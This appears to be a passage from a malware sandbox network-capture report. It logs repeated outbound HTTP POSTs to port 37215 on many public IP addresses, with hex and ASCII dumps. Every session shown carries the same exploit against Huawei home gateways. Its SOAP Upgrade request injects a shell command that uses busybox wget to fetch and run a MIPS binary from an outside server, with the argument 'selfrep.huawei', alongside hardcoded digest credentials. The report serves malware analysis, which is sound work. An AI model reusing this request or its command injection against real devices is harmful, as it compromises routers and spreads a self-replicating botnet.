                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1812192.168.2.234699441.226.134.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.545877934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1813192.168.2.2333088197.129.5.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.545887947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1814192.168.2.2346418157.246.103.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.545891047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1815192.168.2.233714841.120.28.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.545907021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1816192.168.2.2334172197.213.5.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547399998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1817192.168.2.2352128157.40.44.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547549009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1818192.168.2.233728641.33.28.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547552109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1819192.168.2.2333344157.93.95.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547662020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1820192.168.2.234773041.158.147.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547671080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1821192.168.2.234340047.249.232.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547719002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
